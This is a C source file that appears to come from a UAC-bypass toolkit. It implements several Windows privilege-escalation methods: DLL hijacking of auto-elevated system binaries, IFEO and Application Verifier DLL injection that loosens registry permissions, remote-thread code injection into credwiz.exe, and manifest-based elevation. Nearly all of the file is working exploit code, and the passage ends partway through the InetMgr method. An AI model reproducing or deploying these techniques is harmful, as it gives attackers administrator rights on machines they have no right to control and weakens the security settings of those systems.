/******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2015 - 2019 * * TITLE: HYBRIDS.C * * VERSION: 3.19 * * DATE: 01 Sep 2019 * * Hybrid UAC bypass methods. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #include "global.h" #include "makecab.h" #include "encresource.h" LOAD_PARAMETERS_SIREFEF g_SirefefLoadParams; /* * ucmMethodCleanupSingleFileSystem32 * * Purpose: * * Post execution cleanup routine. * * lpItemName length limited to MAX_PATH * */ BOOL ucmMethodCleanupSingleItemSystem32( LPWSTR lpItemName ) { WCHAR szBuffer[MAX_PATH * 2]; _strcpy(szBuffer, g_ctx->szSystemDirectory); _strcat(szBuffer, lpItemName); return ucmMasqueradedDeleteDirectoryFileCOM(szBuffer); } /* * ucmAvrfMethod * * Purpose: * * Acquire elevation through Application Verifier dll injection. * * Fixed in Windows 10 TH1 * */ NTSTATUS ucmAvrfMethod( _In_ PVOID AvrfDll, _In_ DWORD AvrfDllSize ) { BOOL bWusaNeedCleanup = FALSE; NTSTATUS MethodResult = STATUS_ACCESS_DENIED; HKEY hKey = NULL, hSubKey = NULL; LRESULT lRet; DWORD dwValue = 0x100; // FLG_APPLICATION_VERIFIER; WCHAR szBuffer[MAX_PATH * 2]; WCHAR szSourceDll[MAX_PATH * 2]; UNICODE_STRING ustr; OBJECT_ATTRIBUTES obja; do { // // Extract file to the protected directory. // First, create cab with fake msu ext, second run fusion process. // RtlSecureZeroMemory(szSourceDll, sizeof(szSourceDll)); _strcpy(szSourceDll, g_ctx->szTempDirectory); _strcat(szSourceDll, HIBIKI_DLL); bWusaNeedCleanup = ucmCreateCabinetForSingleFile(szSourceDll, AvrfDll, AvrfDllSize, NULL); if (!bWusaNeedCleanup) break; // Drop Hibiki to system32 if (!ucmWusaExtractPackage(g_ctx->szSystemDirectory)) break; // // Set new key security DACL. // Red Alert: manually restore IFEO key permissions after using this tool, as they are not inherited. // if (!ucmMasqueradedAlterObjectSecurityCOM( T_IFEO, DACL_SECURITY_INFORMATION, SE_REGISTRY_KEY, T_SDDL_ALL_FOR_EVERYONE)) break; // // Open IFEO key. // RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, L"\\REGISTRY\\"); _strcat(szBuffer, T_IFEO); RtlInitUnicodeString(&ustr, szBuffer); InitializeObjectAttributes(&obja, &ustr, OBJ_CASE_INSENSITIVE, NULL, NULL); MethodResult = NtOpenKey((PHANDLE)&hKey, MAXIMUM_ALLOWED, &obja); if (!NT_SUCCESS(MethodResult)) break; // // Create application key. // hSubKey = NULL; lRet = RegCreateKey(hKey, CLICONFG_EXE, &hSubKey); if ((hSubKey == NULL) || (lRet != ERROR_SUCCESS)) { MethodResult = STATUS_ACCESS_DENIED; break; } // // Set verifier flag value. // lRet = RegSetValueEx(hSubKey, T_GLOBAL_FLAG, 0, REG_DWORD, (BYTE*)&dwValue, sizeof(DWORD)); if (lRet != ERROR_SUCCESS) { MethodResult = STATUS_ACCESS_DENIED; break; } // // Set verifier dll value. // dwValue = (DWORD)((1 + _strlen(HIBIKI_DLL)) * sizeof(WCHAR)); lRet = RegSetValueEx(hSubKey, TEXT("VerifierDlls"), 0, REG_SZ, (BYTE*)&HIBIKI_DLL, dwValue); if (lRet != ERROR_SUCCESS) { MethodResult = STATUS_ACCESS_DENIED; break; } // // Cleanup registry, we don't need anymore. // RegCloseKey(hSubKey); hSubKey = NULL; NtClose(hKey); hKey = NULL; // // Extract file to the protected directory. // First, create cab with fake msu ext, second run fusion process. // RtlSecureZeroMemory(szSourceDll, sizeof(szSourceDll)); _strcpy(szSourceDll, g_ctx->szTempDirectory); _strcat(szSourceDll, HIBIKI_DLL); if (ucmCreateCabinetForSingleFile(szSourceDll, AvrfDll, AvrfDllSize, NULL)) { // Drop Hibiki to system32 if (ucmWusaExtractPackage(g_ctx->szSystemDirectory)) { // Finally run target fusion process. RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, g_ctx->szSystemDirectory); _strcat(szBuffer, CLICONFG_EXE); if (supRunProcess(szBuffer, NULL)) MethodResult = STATUS_SUCCESS; } ucmWusaCabinetCleanup(); } } while (FALSE); if (hKey != NULL) { NtClose(hKey); } if (hSubKey != NULL) { RegCloseKey(hSubKey); } if (bWusaNeedCleanup) { ucmWusaCabinetCleanup(); } return MethodResult; } /* * ucmWinSATMethod * * Purpose: * * Acquire elevation through abusing APPINFO.DLL whitelisting model logic and wusa installer/IFileOperation autoelevation. * Slightly modified target and proxydll can work almost with every autoelevated/whitelisted application. * This method uses advantage of wusa to write to the protected folders, but can be adapted to IFileOperation too. * WinSAT used for demonstration purposes only. * * Fixed in Windows 10 TH2 (complete vector) * */ NTSTATUS ucmWinSATMethod( _In_ LPWSTR lpTargetDll, _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize, _In_ BOOL UseWusa ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; BOOL bCopyResult = FALSE; CABDATA *Cabinet = NULL; WCHAR szSource[MAX_PATH * 2]; WCHAR szDest[MAX_PATH * 2]; WCHAR szBuffer[MAX_PATH * 2]; if (_strlen(lpTargetDll) > 100) { return STATUS_INVALID_PARAMETER_1; } RtlSecureZeroMemory(szSource, sizeof(szSource)); RtlSecureZeroMemory(szDest, sizeof(szDest)); do { _strcpy(szSource, g_ctx->szSystemDirectory); _strcat(szSource, WINSAT_EXE); _strcpy(szDest, g_ctx->szTempDirectory); _strcat(szDest, WINSAT_EXE); // Copy winsat to temp directory if (!CopyFile(szSource, szDest, FALSE)) { break; } //put target dll RtlSecureZeroMemory(szSource, sizeof(szSource)); _strcpy(szSource, g_ctx->szTempDirectory); _strcat(szSource, lpTargetDll); //write proxy dll to disk if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) { break; } // // Two options: use wusa installer or IFileOperation // if (UseWusa) { //build cabinet _strcpy(szBuffer, g_ctx->szTempDirectory); _strcat(szBuffer, ELLOCNAK_MSU); Cabinet = cabCreate(szBuffer); if (Cabinet) { _strcpy(szDest, g_ctx->szTempDirectory); _strcat(szDest, WINSAT_EXE); //put proxy dll inside cabinet cabAddFile(Cabinet, szSource, lpTargetDll); //put winsat.exe cabAddFile(Cabinet, szDest, WINSAT_EXE); cabClose(Cabinet); } else { break; } //extract package RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, g_ctx->szSystemDirectory); _strcat(szBuffer, SYSPREP_DIR); bCopyResult = ucmWusaExtractPackage(szBuffer); } else { //wusa extract banned, switch to IFileOperation. RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, g_ctx->szSystemDirectory); _strcat(szBuffer, SYSPREP_DIR); if (ucmMasqueradedMoveFileCOM(szSource, szBuffer)) { bCopyResult = ucmMasqueradedMoveFileCOM(szDest, szBuffer); } } } while (FALSE); if (bCopyResult) { //run winsat RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, g_ctx->szSystemDirectory); _strcat(szBuffer, SYSPREP_DIR); _strcat(szBuffer, WINSAT_EXE); if (supRunProcess(szBuffer, NULL)) MethodResult = STATUS_SUCCESS; } //remove trash from %temp% if (szDest[0] != 0) { DeleteFileW(szDest); } if (szSource[0] != 0) { DeleteFileW(szSource); } return MethodResult; } /* * ucmMMCMethodCleanup * * Purpose: * * Post execution cleanup routine for MMCMethod(s). * */ BOOL ucmMMCMethodCleanup( _In_ UCM_METHOD Method ) { WCHAR szBuffer[MAX_PATH * 2]; _strcpy(szBuffer, g_ctx->szSystemDirectory); switch (Method) { case UacMethodMMC1: _strcat(szBuffer, ELSEXT_DLL); break; case UacMethodMMC2: _strcat(szBuffer, WBEM_DIR); _strcat(szBuffer, WBEMCOMN_DLL); break; default: return FALSE; break; } return ucmMasqueradedDeleteDirectoryFileCOM(szBuffer); } /* * ucmMMCMethod * * Purpose: * * Bypass UAC by abusing MMC.exe backdoor hardcoded in appinfo.dll * */ NTSTATUS ucmMMCMethod( _In_ UCM_METHOD Method, _In_ LPWSTR lpTargetDll, _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; LPWSTR lpMscFile = NULL; WCHAR szSource[MAX_PATH * 2]; WCHAR szDest[MAX_PATH * 2]; if (_strlen(lpTargetDll) > 100) { return STATUS_INVALID_PARAMETER_2; } do { //check if file exists (like on srv for example) RtlSecureZeroMemory(szDest, sizeof(szDest)); _strcpy(szDest, g_ctx->szSystemDirectory); switch (Method) { case UacMethodMMC2: _strcat(szDest, WBEM_DIR); break; default: break; } _strcat(szDest, lpTargetDll); if (PathFileExists(szDest)) break; //target dir RtlSecureZeroMemory(szDest, sizeof(szDest)); _strcpy(szDest, g_ctx->szSystemDirectory); switch (Method) { case UacMethodMMC2: _strcat(szDest, WBEM_DIR); lpMscFile = RSOP_MSC; break; default: lpMscFile = EVENTVWR_MSC; break; } //put target dll RtlSecureZeroMemory(szSource, sizeof(szSource)); _strcpy(szSource, g_ctx->szTempDirectory); _strcat(szSource, lpTargetDll); //write proxy dll to disk if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) { break; } //move proxy dll to target directory if (!ucmMasqueradedMoveFileCOM(szSource, szDest)) { break; } //run mmc console //because of mmc harcoded backdoor uac will autoelevate mmc with valid and trusted MS command. //yuubari identified multiple exploits in msc commands loading scheme. if (supRunProcess(MMC_EXE, lpMscFile)) MethodResult = STATUS_SUCCESS; } while (FALSE); return MethodResult; } /* * ucmSirefefMethodCleanup * * Purpose: * * Post execution cleanup routine for SirefefMethod. * */ BOOL ucmSirefefMethodCleanup( VOID ) { BOOL bResult1, bResult2; WCHAR szBuffer[MAX_PATH * 2]; _strcpy(szBuffer, g_ctx->szSystemDirectory); _strcat(szBuffer, WBEM_DIR); _strcat(szBuffer, OOBE_EXE); bResult1 = ucmMasqueradedDeleteDirectoryFileCOM(szBuffer); _strcpy(szBuffer, g_ctx->szSystemDirectory); _strcat(szBuffer, WBEM_DIR); _strcat(szBuffer, NETUTILS_DLL); bResult2 = ucmMasqueradedDeleteDirectoryFileCOM(szBuffer); return ((bResult1 != FALSE) && (bResult2 != FALSE)); } /* * ucmxElevatedLaunchProc * * Purpose: * * Elevation procedure used by Sirefef method * */ DWORD WINAPI ucmxElevatedLaunchProc( _In_ LOAD_PARAMETERS_SIREFEF *Params ) { SHELLEXECUTEINFOW shexec; shexec.cbSize = sizeof(shexec); shexec.fMask = SEE_MASK_NOCLOSEPROCESS; shexec.nShow = SW_SHOW; shexec.lpVerb = Params->szVerb; shexec.lpFile = Params->szTargetApp; shexec.lpParameters = NULL; shexec.lpDirectory = NULL; if (Params->ShellExecuteExW(&shexec)) if (shexec.hProcess != NULL) { Params->WaitForSingleObject(shexec.hProcess, INFINITE); Params->CloseHandle(shexec.hProcess); } return Params->RtlExitUserThread(STATUS_SUCCESS); } /* * ucmSirefefMethod * * Purpose: * * Bypass UAC by abusing OOBE.exe backdoor hardcoded in appinfo.dll * * Simplified, original Sirefef code do all copy operations from zombified process. * * Fixed in Windows 10 TH2 * */ NTSTATUS ucmSirefefMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED, Status; SIZE_T memIO; HANDLE hProcess = NULL, hRemoteThread = NULL; HINSTANCE InjectorImageBase = g_hInstance; PIMAGE_NT_HEADERS NtHeaders = RtlImageNtHeader(InjectorImageBase); LPVOID RemoteCode = NULL, newEp, newDp; PLOAD_PARAMETERS_SIREFEF LoadParams = &g_SirefefLoadParams; PVOID LoadProc = ucmxElevatedLaunchProc; WCHAR szB1[MAX_PATH * 2]; WCHAR szB2[MAX_PATH * 2]; do { // // Drop Fubuki to the %temp% as NetUtils.dll // _strcpy(szB1, g_ctx->szTempDirectory); _strcat(szB1, NETUTILS_DLL); if (!supWriteBufferToFile(szB1, ProxyDll, ProxyDllSize)) break; // // Move %temp%\NetUtils.dll to %SystemRoot%\System32\Wbem // _strcpy(szB2, g_ctx->szSystemDirectory); _strcat(szB2, WBEM_DIR); if (!ucmMasqueradedMoveFileCOM(szB1, szB2)) break; // // Copy %SystemRoot%\system32\credwiz.exe to %temp\oobe.exe // _strcpy(szB1, g_ctx->szSystemDirectory); _strcat(szB1, CREDWIZ_EXE); _strcpy(szB2, g_ctx->szTempDirectory); _strcat(szB2, OOBE_EXE); if (!CopyFile(szB1, szB2, FALSE)) break; // // Move %temp%\oobe.exe to %SystemRoot%\system32\wbem // _strcpy(szB1, g_ctx->szSystemDirectory); _strcat(szB1, WBEM_DIR); if (!ucmMasqueradedMoveFileCOM(szB2, szB1)) break; // // Prepare shellcode params. // RtlSecureZeroMemory(LoadParams, sizeof(LOAD_PARAMETERS_SIREFEF)); _strcpy(LoadParams->szVerb, RUNAS_VERB); _strcat(szB1, OOBE_EXE); _strncpy(LoadParams->szTargetApp, MAX_PATH, szB1, MAX_PATH); LoadParams->ShellExecuteExW = (pfnShellExecuteExW)GetProcAddress( g_ctx->hShell32, "ShellExecuteExW"); LoadParams->WaitForSingleObject = (pfnWaitForSingleObject)GetProcAddress( g_ctx->hKernel32, "WaitForSingleObject"); LoadParams->CloseHandle = (pfnCloseHandle)GetProcAddress( g_ctx->hKernel32, "CloseHandle"); LoadParams->RtlExitUserThread = (pfnRtlExitUserThread)GetProcAddress( g_ctx->hNtdll, "RtlExitUserThread"); // // Run host process. // _strcpy(szB1, g_ctx->szSystemDirectory); _strcat(szB1, CREDWIZ_EXE); hProcess = supRunProcessEx(szB1, NULL, NULL, NULL); if (hProcess == NULL) break; // // Inject load code. // memIO = NtHeaders->OptionalHeader.SizeOfImage; Status = NtAllocateVirtualMemory( hProcess, &RemoteCode, 0, &memIO, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (!NT_SUCCESS(Status)) { MethodResult = Status; break; } if (RemoteCode == NULL) { MethodResult = STATUS_INTERNAL_ERROR; break; } memIO = NtHeaders->OptionalHeader.SizeOfImage; Status = NtWriteVirtualMemory( hProcess, RemoteCode, InjectorImageBase, memIO, &memIO); if (!NT_SUCCESS(Status)) { MethodResult = Status; break; } newEp = (char *)RemoteCode + ((char *)LoadProc - (char *)InjectorImageBase); newDp = (char *)RemoteCode + ((char *)LoadParams - (char *)InjectorImageBase); Status = RtlCreateUserThread( hProcess, NULL, FALSE, 0, 0, 0, (PUSER_THREAD_START_ROUTINE)newEp, newDp, &hRemoteThread, NULL); if (!NT_SUCCESS(Status)) { MethodResult = Status; break; } if (hRemoteThread != NULL) { WaitForSingleObject(hRemoteThread, INFINITE); NtClose(hRemoteThread); MethodResult = STATUS_SUCCESS; } } while (FALSE); // // Cleanup (system32\wbem data must be removed by payload code). // if (hProcess) { TerminateProcess(hProcess, 0); CloseHandle(hProcess); } _strcpy(szB1, g_ctx->szTempDirectory); _strcat(szB1, NETUTILS_DLL); DeleteFile(szB1); _strcpy(szB1, g_ctx->szTempDirectory); _strcat(szB1, OOBE_EXE); DeleteFile(szB1); return MethodResult; } /* * ucmGenericAutoelevation * * Purpose: * * Bypass UAC by abusing target autoelevated system32 application via missing system32 dll * */ NTSTATUS ucmGenericAutoelevation( _In_ LPWSTR lpTargetApp, _In_ LPWSTR lpTargetDll, _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; WCHAR szSource[MAX_PATH * 2]; WCHAR szDest[MAX_PATH * 2]; if (_strlen(lpTargetDll) > 100) { return STATUS_INVALID_PARAMETER_2; } //put target dll RtlSecureZeroMemory(szSource, sizeof(szSource)); _strcpy(szSource, g_ctx->szTempDirectory); _strcat(szSource, lpTargetDll); //write proxy dll to disk if (supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) { //target dir RtlSecureZeroMemory(szDest, sizeof(szDest)); _strcpy(szDest, g_ctx->szSystemDirectory); //drop payload to system32 if (ucmMasqueradedMoveFileCOM(szSource, szDest)) { //run target app if (supRunProcess(lpTargetApp, NULL)) MethodResult = STATUS_SUCCESS; } } return MethodResult; } /* * ucmGWX * * Purpose: * * Bypass UAC by abusing newly added appinfo.dll backdoor. * IIS initially not installed in Windows client, but appinfo.dll whitelists IIS application as autoelevated. * We will use backdoor from "Get Windows 10" bullshit marketing promo package and exploit it with dll hijacking as usual. * * Since this method very out-dated (GWX program expired long time ago) starting from 2.5.6 Kongou module removed from program resources. * To use it again place KongouXX.cd to the program directory, where XX is platform (32 or 64). * Kongou located in project "bin" directory in encrypted and compressed state, Akagi will load, decrypt and decompress it. * * Fixed in Windows 10 RS1 * */ NTSTATUS ucmGWX( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; WCHAR szDest[MAX_PATH * 2]; WCHAR szSource[MAX_PATH * 2]; WCHAR szTargetApp[MAX_PATH * 2]; PVOID Data = NULL, Ptr = NULL; ULONG DecompressedBufferSize = 0, DataSize = 0; do { //target dir RtlSecureZeroMemory(szDest, sizeof(szDest)); _strcpy(szDest, g_ctx->szSystemDirectory); _strcat(szDest, INETSRV_DIR); _strcat(szDest, INETMGR_EXE); //File already exist, so IIS could be installed if (PathFileExists(szDest)) { #ifdef _DEBUG supDebugPrint(TEXT("ucmGWX"), ERROR_FILE_EXISTS); #endif MethodResult = STATUS_OBJECT_NAME_EXISTS; break; } //summon some unicorns, kongouXX.cd expected to be in the same directory as application Ptr = supReadFileToBuffer(KONGOU_CD, &DataSize); if (Ptr == NULL) { #ifdef _DEBUG supDebugPrint(TEXT("ucmGWX"), ERROR_FILE_NOT_FOUND); #endif MethodResult = STATUS_OBJECT_NAME_NOT_FOUND; break; } Data = g_ctx->DecompressRoutine(KONGOU_ID, Ptr, DataSize, &DecompressedBufferSize); if (Data == NULL) break; //write proxy dll to disk RtlSecureZeroMemory(szSource, sizeof(szSource)); _strcpy(szSource, g_ctx->szTempDirectory); _strcat(szSource, SLC_DLL); if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) break; //drop fubuki to system32\inetsrv RtlSecureZeroMemory(szDest, sizeof(szDest)); _strcpy(szDest, g_ctx->szSystemDirectory); _strcat(szDest, INETSRV_DIR); if (!ucmMasqueradedMoveFileCOM(szSource, szDest)) { break; } //put target app RtlSecureZeroMemory(szSource, sizeof(szSource)); _strcpy(szSource, g_ctx->szTempDirectory); _strcat(szSource, INETMGR_EXE); //write app to disk if (!supWriteBufferToFile(szSource, Data, DecompressedBufferSize)) { break; } //drop InetMgr.exe to system32\inetsrv if (!ucmMasqueradedMoveFileCOM(szSource, szDest)) { break; } _strcpy(szTargetApp, szDest); _strcat(szTargetApp, INETMGR_EXE); if (supRunProcess(szTargetApp, NULL)) MethodResult = STATUS_SUCCESS; } while (FALSE); if (Data != NULL) { RtlSecureZeroMemory(Data, DecompressedBufferSize); supVirtualFree(Data, NULL); } if (Ptr != NULL) { supVirtualFree(Ptr, NULL); } return MethodResult; } /* * ucmxAutoElevateManifestDropDll * * Purpose: * * Drop target dll for ucmAutoElevateManifest. * */ BOOL ucmxAutoElevateManifestDropDll( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { WCHAR szDest[MAX_PATH * 2]; WCHAR szSource[MAX_PATH * 2]; RtlSecureZeroMemory(szSource, sizeof(szSource)); _strcpy(szSource, g_ctx->szTempDirectory); _strcat(szSource, CRYPTBASE_DLL); if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) { return FALSE; } RtlSecureZeroMemory(szDest, sizeof(szDest)); _strcpy(szDest, g_ctx->szSystemDirectory); _strcat(szDest, SYSPREP_DIR); return ucmMasqueradedMoveFileCOM(szSource, szDest); } /* * ucmAutoElevateManifestW7 * * Purpose: * * Special case for Windows 7. * */ NTSTATUS ucmAutoElevateManifestW7( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; WCHAR szDest[MAX_PATH * 2]; WCHAR szSource[MAX_PATH * 2]; LPWSTR lpApplication = NULL; do { RtlSecureZeroMemory(szSource, sizeof(szSource)); RtlSecureZeroMemory(szDest, sizeof(szDest)); _strcpy(szSource, g_ctx->szSystemDirectory); _strcpy(szDest, g_ctx->szTempDirectory); lpApplication = TASKHOST_EXE;//doesn't really matter, Yuubari module lists multiple targets _strcat(szSource, lpApplication); _strcat(szDest, lpApplication); // Copy target to temp directory if (!CopyFile(szSource, szDest, FALSE)) break; _strcpy(szSource, szDest); // Copy target app to windir RtlSecureZeroMemory(szDest, sizeof(szDest)); _strcpy(szDest, USER_SHARED_DATA->NtSystemRoot); _strcat(szDest, TEXT("\\")); if (!ucmMasqueradedMoveFileCOM(szSource, szDest)) { break; } if (!ucmxAutoElevateManifestDropDll(ProxyDll, ProxyDllSize)) { break; } //put target manifest RtlSecureZeroMemory(szSource, sizeof(szSource)); _strcpy(szSource, g_ctx->szTempDirectory); _strcat(szSource, lpApplication); _strcat(szSource, MANIFEST_EXT); if (!supDecodeAndWriteBufferToFile(szSource, (CONST PVOID)&g_encodedManifestData, sizeof(g_encodedManifestData), AKAGI_XOR_KEY2)) { break; } RtlSecureZeroMemory(szDest, sizeof(szDest)); _strcpy(szDest, USER_SHARED_DATA->NtSystemRoot); if (!ucmMasqueradedMoveFileCOM(szSource, szDest)) { break; } _strcat(szDest, L"\\"); _strcat(szDest, lpApplication); if (supRunProcess(szDest, NULL)) MethodResult = STATUS_SUCCESS; } while (FALSE); return MethodResult; } /* * ucmAutoElevateManifest * * Purpose: * * Bypass UAC by abusing appinfo whitelist and SXS undocumented feature. * Ironically revealed by Microsoft itself in their attempt to fix UAC exploit. * Supported at Windows 7 minimum (older versions not checked). * * Fixed in Windows 10 RS1 * */ NTSTATUS ucmAutoElevateManifest( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; WCHAR szDest[MAX_PATH * 2]; WCHAR szSource[MAX_PATH * 2]; LPWSTR lpApplication = NULL; do { if (g_ctx->dwBuildNumber < 9600) { return ucmAutoElevateManifestW7(ProxyDll, ProxyDllSize); } RtlSecureZeroMemory(szSource, sizeof(szSource)); RtlSecureZeroMemory(szDest, sizeof(szDest)); _strcpy(szSource, g_ctx->szSystemDirectory); _strcpy(szDest, g_ctx->szTempDirectory); _strcat(szSource, TZSYNC_EXE); //doesn't really matter, Yuubari module lists multiple targets lpApplication = MIGWIZ_EXE; _strcat(szDest, lpApplication); // Copy target to temp directory if (!CopyFile(szSource, szDest, FALSE)) break; _strcpy(szSource, szDest); // Copy target app to home RtlSecureZeroMemory(szDest, sizeof(szDest)); _strcpy(szDest, g_ctx->szSystemDirectory); if (!ucmMasqueradedMoveFileCOM(szSource, szDest)) { break; } if (!ucmxAutoElevateManifestDropDll(ProxyDll, ProxyDllSize)) { break; } //put target manifest RtlSecureZeroMemory(szSource, sizeof(szSource)); _strcpy(szSource, g_ctx->szTempDirectory); _strcat(szSource, lpApplication); _strcat(szSource, MANIFEST_EXT); if (!supDecodeAndWriteBufferToFile(szSource, (CONST PVOID)&g_encodedManifestData, sizeof(g_encodedManifestData), AKAGI_XOR_KEY2)) { break; } RtlSecureZeroMemory(szDest, sizeof(szDest)); _strcpy(szDest, g_ctx->szSystemDirectory); if (!ucmMasqueradedMoveFileCOM(szSource, szDest)) { break; } _strcpy(szDest, g_ctx->szSystemDirectory); _strcat(szDest, lpApplication); if (supRunProcess(szDest, NULL)) MethodResult = STATUS_SUCCESS; } while (FALSE); return MethodResult; } /* * ucmInetMgrFindCallback * * Purpose: * * File search callback which does all the magic. * */ BOOL ucmInetMgrFindCallback( _In_ WIN32_FIND_DATA *fdata, _In_ LPWSTR lpDirectory, _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { BOOL bCond = FALSE, bSuccess = FALSE; SIZE_T l = 0; HANDLE hFile = INVALID_HANDLE_VALUE, hFileMapping = NULL; PDWORD MappedFile = NULL; LARGE_INTEGER FileSize; CFILE_TYPE ft; PVOID OutputBuffer = NULL; SIZE_T OutputBufferSize = 0; WCHAR textbuf[MAX_PATH * 4]; WCHAR szDest[MAX_PATH * 2]; if (lpDirectory == NULL) return FALSE; do { if (fdata->dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) break; if (_strcmpi(fdata->cFileName, INETMGR_EXE) != 0) break; RtlSecureZeroMemory(&textbuf, sizeof(textbuf)); _strcpy(textbuf, lpDirectory); l = _strlen(textbuf); if (textbuf[l - 1] != L'\\') { textbuf[l] = L'\\'; textbuf[l + 1] = 0; } _strcat(textbuf, fdata->cFileName); hFile = CreateFile(textbuf, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL); if (hFile == INVALID_HANDLE_VALUE) break; FileSize.QuadPart = 0; if (!GetFileSizeEx(hFile, &FileSize)) break; if (FileSize.QuadPart < 8) break; hFileMapping = CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL); if (hFileMapping == NULL) break; MappedFile = (PDWORD)MapViewOfFile(hFileMapping, PAGE_READWRITE, 0, 0, 0); if (MappedFile == NULL) break; ft = GetTargetFileType(MappedFile); if (ft == ftUnknown) break; switch (ft) { case ftMZ: //win7 bSuccess = ProcessFileMZ(MappedFile, (SIZE_T)FileSize.LowPart, &OutputBuffer, &OutputBufferSize); break; case ftDCN://win8 bSuccess = ProcessFileDCN(MappedFile, (SIZE_T)FileSize.LowPart, &OutputBuffer, &OutputBufferSize); break; case ftDCS://win10 if (InitCabinetDecompressionAPI()) { bSuccess = ProcessFileDCS(MappedFile, (SIZE_T)FileSize.LowPart, &OutputBuffer, &OutputBufferSize); } break; default: break; } //is there any error processing files from winsxs? if (!bSuccess) break; RtlSecureZeroMemory(&textbuf, sizeof(textbuf)); _strcpy(textbuf, g_ctx->szTempDirectory); _strcat(textbuf, INETMGR_EXE); bSuccess = supWriteBufferToFile(textbuf, OutputBuffer, (DWORD)OutputBufferSize); if (!bSuccess) break; RtlSecureZeroMemory(&szDest, sizeof(szDest)); _strcpy(szDest, g_ctx->szSystemDirectory); _strcat(szDest, INETSRV_DIR); bSuccess = ucmMasqueradedMoveFileCOM(textbuf, szDest); if (!bSuccess) break; _strcpy(textbuf, g_ctx->szTempDirectory); _strcat(textbuf, MSCOREE_DLL); bSuccess = supWriteBufferToFile(textbuf, ProxyDll, ProxyDllSize); if (!bSuccess) break; bSuccess = ucmMasqueradedMoveFileCOM(textbuf, szDest); if (!bSuccess) break; _strcat(szDest, INETMGR_EXE); bSuccess = supRunProcess(szDest, NULL); } while (bCond); if (MappedFile != NULL) UnmapViewOfFile(MappedFile); if (hFileMapping != NULL) CloseHandle(hFileMapping); if (hFile != INVALID_HANDLE_VALUE) CloseHandle(hFile); if (OutputBuffer != NULL) supHeapFree(OutputBuffer); return bSuccess; } typedef BOOL(CALLBACK *UCMX_FIND_FILE_CALLBACK)( _In_ WIN32_FIND_DATA *fdata, _In_ LPWSTR lpDirectory, _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); /* * ucmxScanFiles * * Purpose: * * Find files of the given type and run callback over them. * */ BOOL ucmxScanFiles( _In_ LPWSTR lpDirectory, _In_ LPWSTR lpFileType, _In_ UCMX_FIND_FILE_CALLBACK Callback, _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { BOOL bStopEnumeration = FALSE; HANDLE hFile; WCHAR textbuf[MAX_PATH * 2]; WIN32_FIND_DATA fdata; if ((Callback == NULL) || (lpDirectory == NULL) || (lpFileType == NULL)) return FALSE; RtlSecureZeroMemory(textbuf, sizeof(textbuf)); _strncpy(textbuf, MAX_PATH, lpDirectory, MAX_PATH); _strcat(textbuf, L"\\"); _strncpy(_strend(textbuf), 20, lpFileType, 20); RtlSecureZeroMemory(&fdata, sizeof(fdata)); hFile = FindFirstFile(textbuf, &fdata); if (hFile != INVALID_HANDLE_VALUE) { do { bStopEnumeration = Callback(&fdata, lpDirectory, ProxyDll, ProxyDllSize); if (bStopEnumeration) break; } while (FindNextFile(hFile, &fdata)); FindClose(hFile); } return bStopEnumeration; } /* * ucmInetMgrMethod * * Purpose: * * Since Windows 10 TH2 appinfo whitelist with full path two applications, which they were unable to redesign/move. * Sysprep.exe and inetmgr.exe (IIS). This was made in a favor of the UAC fix where was fixed * WinSAT concept method, when you can copy autoelevated executables within windows folders to do all * required preparations for dll hijack. However InetMgr.exe does not exist in default windows setup. * This component installed only if user choose to install IIS which most of people don't use at all. * InetMgr component sits in winsxs folder (packed in win8+). We will simple use it (expand if needed) and abuse dll hijack * as always directly with their hardcoded "safe" file path. * * Fixed in Windows 10 RS1 * */ NTSTATUS ucmInetMgrMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; BOOL bScanResult; WCHAR szBuffer[MAX_PATH * 2]; WCHAR szDirBuf[MAX_PATH * 2]; HANDLE hFindFile; WIN32_FIND_DATA fdata; do { //target dir RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, g_ctx->szSystemDirectory); _strcat(szBuffer, INETSRV_DIR); _strcat(szBuffer, INETMGR_EXE); //File already exist, so IIS could be installed if (PathFileExists(szBuffer)) { MethodResult = STATUS_OBJECT_NAME_EXISTS; break; } 